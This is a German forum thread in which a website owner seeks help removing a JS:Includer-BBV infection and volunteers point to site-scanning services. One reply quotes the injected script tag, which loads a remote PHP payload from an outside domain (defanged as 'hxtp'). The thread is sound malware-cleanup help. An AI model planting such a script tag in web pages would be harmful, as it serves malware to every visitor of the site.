Author Topic: JS:Includer-BBV (Read 2774 times)

REDACTED · « **on:** December 28, 2015, 01:21:49 PM »

Beiträge: 1
Profil anzeigen
E-Mail
Private Mitteilung (Online)

JS:Includer-BBV auf der Homepage

« am: Heute um 12:37:24 Nachmittag »

Zitat

Ändern

Hallo Profis,

bei mir ist das Problem, ich hab den JS:Includer-BBV nicht auf dem Rechner sondern online auf der Homepage :-(

Ich habe von meinem Provider eine Email erhalten dass er meine Homepage vorübergehend gesperrt hat weil über die Domain ein Virus verteilt wird.

Nun habe ich mir die .html Dateien mal runtergezogen und mit AVAST geprüft Ergebnis "Bedrohung: JS:Includer-BBV"

Ich kann aber in der html Datei nichts finden was "komisch" aussieht.. Weiß jemand einen Rat wie ich die Linie mit dem script finden kann?

URL: www.arga-tec.de

Grüße Jochen

Asyn · « **Reply #1 on:** December 28, 2015, 01:26:01 PM »

Hallo Jochen, siehe: https://sitecheck.sucuri.net/results/www.arga-tec.de/

Willkommen im Forum,
Asyn

Pondus · « **Reply #2 on:** December 28, 2015, 01:29:04 PM »

Killmalware: http://killmalware.com/www.arga-tec.de/

Unmaskparasites: http://www.UnmaskParasites.com/security-report/?page=www.arga-tec.de

polonus · « **Reply #3 on:** December 28, 2015, 01:36:24 PM »

Sucuri meint dies auf zu finden: Bekanntes javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-include-suspicious?v14
</div><script type="text/javascript" src="hxtp://lovelylittle.com.au/dmw6cjrz.php?id=1543174"></script>
Nichts hier: https://urlquery.net/report.php?id=1451305076135
Blockiert fuer mich von Scriptblocker: GET -/cgi-bin/counter/stats.cgi?id=argatec&gid=&loc=-http%3A//www.arga-tec.de/&ref=&res=1600x900&browser=Microsoft%20Internet%20Explorer%208&offset=1%E2%84%91=kkk_weiss.png&display=standard HTTP/1.1
Host: wXw.multicounter.de
Hier nichts Ominöses vorhanden oder auf zu finden: http://fetch.scritch.org/%2Bfetch/?url=www.arga-tec.de&useragent=Fetch+useragent&accept_encoding=
Aber Google Safebrowsing warnt: http://killmalware.com/www.arga-tec.de/
weil Drohung nicht mehr vorhanden scheint: -http://lovelylittle.com.au/dmw6cjrz.php?id=1543175 (leer)
aber Hauptseite von Avast noch als infekziert angegeben sei, wie mit JS-Includer-BVV[Trj] verzeugt.

polonus

REDACTED · « **Reply #4 on:** December 28, 2015, 02:58:38 PM »

vielen lieben Dank an euch.

Ich habe jetzt alle htm Dateien auf dem Server gelöscht, aus den betroffenen Dateien Linie rausgelöscht, und die bearbeiteten Dateien neu auf den Server geladen.

Wenn ich jetzt die Seiten meiner Homepage aufrufe, kommt keine Warnmeldung mehr aber wenn ich die URL mit http://killmalware.com/www.arga-tec.de/ scanne, findet er anscheinend trotzdem noch die betroffenen htm Dateien.. kann es sein das ich einfach noch warten muss für einen neuen scan?

polonus · « **Reply #5 on:** December 28, 2015, 04:24:03 PM »

Gerne gemacht,
Killmalware ist noch nicht aktualisiert, dass wird ja auch weiter behoben sein.
Ein Gutes Jahresende fuer Ihre Webseite...

Damian aka polonus

polonus · « **Reply #6 on:** December 28, 2015, 05:46:22 PM »

Alles OK hier: http://killmalware.com/www.arga-tec.de/#
Google Safebrowsing muss noch die Meldung aendern!

polonus

Asyn · « **Reply #7 on:** December 29, 2015, 05:14:40 AM »

Quote from: Joe721 on December 28, 2015, 02:58:38 PM

vielen lieben Dank an euch.

Bitteschön.

Author Topic: JS:Includer-BBV (Read 2774 times)

REDACTED

JS:Includer-BBV

Asyn

Re: JS:Includer-BBV

Pondus

Re: JS:Includer-BBV

polonus

Re: JS:Includer-BBV

REDACTED

Re: JS:Includer-BBV

polonus

Re: JS:Includer-BBV

polonus

Re: JS:Includer-BBV

Asyn

Re: JS:Includer-BBV